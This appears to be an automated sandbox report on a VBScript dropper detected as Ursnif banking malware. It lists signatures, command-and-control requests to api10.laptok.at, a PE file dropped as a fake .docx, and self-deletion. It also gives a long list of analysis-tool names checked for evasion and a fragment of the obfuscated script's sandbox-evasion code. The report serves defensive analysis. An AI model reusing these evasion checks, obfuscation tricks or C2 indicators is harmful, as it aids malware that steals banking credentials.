Analysis Report az9zLeRbhbs2.vbs

Overview

General Information

Sample Name: az9zLeRbhbs2.vbs
Analysis ID: 285804
MD5: 88d06f971fb46ed7164bbaeec852cbb2
SHA1: d8c80137b3ed1168a3a08f15a7bbdd33e5b38fdb
SHA256: 29b80298cbd5f207bedb6bdf997cefe1d99ea64b391e8b465661c498dd06c49c

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
WScript reads language and country specific registry keys (likely country aware script)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

AV Detection:

barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\irritable.docx Avira: detection malicious, Label: TR/AD.UrsnifDropper.wdonj
Multi AV Scanner detection for domain / URL
Source: api10.laptok.at Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\irritable.docx Virustotal: Detection: 15% Perma Link
Multi AV Scanner detection for submitted file
Source: az9zLeRbhbs2.vbs Virustotal: Detection: 19% Perma Link
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior

Networking:

barindex
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic HTTP traffic detected: GET /api1/oruRKHeLXgiK/8AaWsO3HVAc/C7XeiDu1srWMBx/D8W2W4CJwgiX2GF3alKWJ/7_2BWtg5ArRpwWPi/f_2FVumxuZ7dfwO/Uwed2Jr2vselWFsvw5/owgo4EA_2/F5Rb7ENeAY3Qc4z2QAS7/vFL9NN_2BiwHR5xvrgY/B0MKoGqiVDd95rPsTXZil_/2BA0LTEXiOaUV/HrVh3Y_2/FAX9rUddE_2BzZt1_2FXEBw/Dh8YOQbqUv/r61ngWDK0B2pdOY6M/9Ke7M_2Bpq1X/7Cf5GwNocf_/0A_0Dl7LTr5yD4/8qbWlZLcYkLQKyRZLHCeb/0nshGaqdsRx8ERu2/F0xPrjqVj/whLqpxl9/1nU0a HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/zlMYdDNtbUyEBstF6pv/UDp1VV08DSUhSypZMd82pw/qymMXig2wlRRy/Wajqwpsf/0XsZtnj2_2BoxeYoOMNWoGD/j0f0llsi3h/r7i64SA76D9JyNK1M/oZ457ajTOeu8/55lLE2_2BwJ/0IDEw1rkRLeF2P/M6EoSZU0DvuP7_2BxPVai/gFxePd8goAxyrQE_/2BiWvawFEz4B_2F/WhQ8jQxSLcaeT7gPM_/2Be6VhmxG/wnq22A2ltocMM_2FvKVq/jhfH1Cst0utPgqjiql_/0A_0D2NLLSVdNMg8i2uqB5/WAgAgynjB3xms/rQ2Jsr6MWBSosY_2B3/A HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: msapplication.xml1.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x14d0f720,0x01d68bbe</date><accdate>0x14d0f720,0x01d68bbe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x14d0f720,0x01d68bbe</date><accdate>0x14d0f720,0x01d68bbe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x14d81e2c,0x01d68bbe</date><accdate>0x14d81e2c,0x01d68bbe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x14d81e2c,0x01d68bbe</date><accdate>0x14d81e2c,0x01d68bbe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x14da808c,0x01d68bbe</date><accdate>0x14da808c,0x01d68bbe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.17.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x14da808c,0x01d68bbe</date><accdate>0x14da808c,0x01d68bbe</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Sep 2020 15:12:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: {3DA65EA3-F7B1-11EA-90E2-ECF4BB862DED}.dat.17.dr, ~DF09DF7AAFE25E0444.TMP.17.dr String found in binary or memory: http://api10.laptok.at/api1/oruRKHeLXgiK/8AaWsO3HVAc/C7XeiDu1srWMBx/D8W2W4CJwgiX2GF3alKWJ/7_2BWtg5Ar
Source: {5A6F3536-F7B1-11EA-90E2-ECF4BB862DED}.dat.23.dr, ~DFD7BDCF5432365426.TMP.23.dr String found in binary or memory: http://api10.laptok.at/api1/zlMYdDNtbUyEBstF6pv/UDp1VV08DSUhSypZMd82pw/qymMXig2wlRRy/Wajqwpsf/0XsZtn
Source: msapplication.xml.17.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml2.17.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml3.17.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml4.17.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.17.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml6.17.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml7.17.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.17.dr String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.523372993.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523263028.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523203509.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523287364.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523237194.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523314152.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523351368.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523410634.0000000005C28000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.523372993.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523263028.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523203509.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523287364.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523237194.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523314152.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523351368.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523410634.0000000005C28000.00000004.00000040.sdmp, type: MEMORY

System Summary:

barindex
Java / VBScript file with very long strings (likely obfuscated code)
Source: az9zLeRbhbs2.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.troj.evad.winVBS@7/42@2/2
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{3DA65EA1-F7B1-11EA-90E2-ECF4BB862DED}.dat Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\az9zLeRbhbs2.vbs'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: az9zLeRbhbs2.vbs Virustotal: Detection: 19%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\az9zLeRbhbs2.vbs'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:68 CREDAT:9474 /prefetch:2
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6236 CREDAT:9474 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:68 CREDAT:9474 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6236 CREDAT:9474 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-3853321935-2125563209-4053062332-1002\Software\Microsoft\Office\16.0\Lync Jump to behavior
Source: az9zLeRbhbs2.vbs Static file information: File size 1374433 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: Binary string: c:\39\58\we\She\dollar\54\fun\17\58\Written\56\Coast.pdb source: irritable.docx.0.dr

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.ScriptName, cStr(638293031)) > 0 And compendia391 = 0) ThenExit FunctionEnd If' whod breakthrough baleful peephole cocoa administer Bern spacetime sweatband Renoir pang keen inhalation windbag domestic whatever, 3959229 associable fervid influent GPO Schloss Urdu offal Faust Joaquin lapelled perilous horrible943 sequestration auric911 plan385 serial993 trial standeth Jon smog ice digitalis996 emplace denote balustrade144 electroencephalograph commonality moonbeam keyword metamorphic loop332. interpretive indirect stork inductor lacrosse set problem480 = GetObject("winmgmts:\\.\root\cimv2")set sqXAi = problem480.InstancesOf("Win32_OperatingSystem")REM follicle674 Conrail chine science188 colorimeter serenade994 demur oxalic stretch, 8568349 soulful, sneeze Aquarius, nick FAA destitute herself excessive Leroy726 toolmake Jacobson neonate hillmen soignee ineducable transferor survivor polyhedral ROTC wrath318 sedan condolence nightfall interceptor historian picojoule screwbean opprobrium705 tease levity syllabic alba Cynthia benchmark variable projectile. 9323556 euphorbia loll althea balm mallard. tau solid eddy Burch tan445 Marjorie Montague crowfoot prompt. allow beware civilian sculpture611 Lucretius. benight849, 8269140 pelvis tenure lectern viscometer marvelous stickleback parry Pullman Baxter for each entomology in sqXAiREM gallium, thermo, Pilate, oratoric stonecrop vertex raucous carry glassine dirty joint290 mucosa poultice contradictory772 Othello eager Newcastle apex asperity aqua Orestes jackdaw carryover. Shelton Allan thrush. Huxley sip688, quip neater624 Madras massif. Xavier tupelo primp, insult catenate lesion satiety roomful Viet63 elfin spheroidal grassy incommutable Elmer Meiji orthonormal kerchief midshipmen omnipresent bedfast implicit495 shrub678 decibel Charlemagne morsel denumerable coltish. 6639792 point marriage Drexel erudition400 Acapulco ATEmb = entomology.LastBootUpTimecnfkGw = Mid(ATEmb,1,4) & "-" & Mid(ATEmb,5,2) & "-" & Mid(ATEmb,7,2) & " " & Mid(ATEmb,9,2) & ":" & Mid(ATEmb,11,2) & ":" & Mid(ATEmb,13,2)REM anatomist beth wing symbolic Hayes gallstone Quakeress cheeky, 330596 Yarmouth hybrid gent indigene Medea414 Belshazzar narcotic transposable. cessation rhapsody. 1410370 Bausch algebraic jaunty pinnate macabre justiciable. 6889385 buildup, recruit264 condemn prey flannel729 Orinoco murder Kirkland Papua checksumming cutthroat cameraman716 enunciate fluid Ostrander Angela cretinous anthracite sorrel Beverly370 scarp superfluous barn acrylic Keynes, injury Lares vomit493 stopwatch837 equilibrium Donner scrounge true417 Cromwellian baroque part940 psychometry795 manipulate tumble. 555949 brownish briar Moluccas mock this unanimity trichloroethane simmer338 mantis Markov interruptible blackguard terrestrial salmonella archbishop. 7134769 docket hank aphasia Canaveral Keller realtor follicular amende fortunate terpsichorean Marlene kQBBGBec = abs(datediff("s",cnfkGw,now))YUCYVJ = kQBBGBec \ 60melan

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\irritable.docx Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.523372993.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523263028.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523203509.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523287364.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523237194.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523314152.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523351368.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.523410634.0000000005C28000.00000004.00000040.sdmp, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\az9zlerbhbs2.vbs Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: BEHAVIORDUMPER.EXE@Q
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE@
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE@
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE@
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE@.8
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: PEID.EXE@#Z
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE@
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXE@A
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE@.
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE@
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE@
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE@:V
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXE@J
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE
Source: wscript.exe, 00000000.00000002.424874899.0000024EC0F61000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE@
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.402150311.0000024EC0F79000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.402057303.0000024EC0F80000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
WScript reads language and country specific registry keys (likely country aware script)
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\irritable.docx Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 68 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: wscript.exe, 00000000.00000002.427862956.0000024EC5750000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000002.427862956.0000024EC5750000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.427862956.0000024EC5750000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.427862956.0000024EC5750000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: irritable.docx.0.dr Jump to dropped file

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Kaplan.zip VolumeInformation Jump to behavior
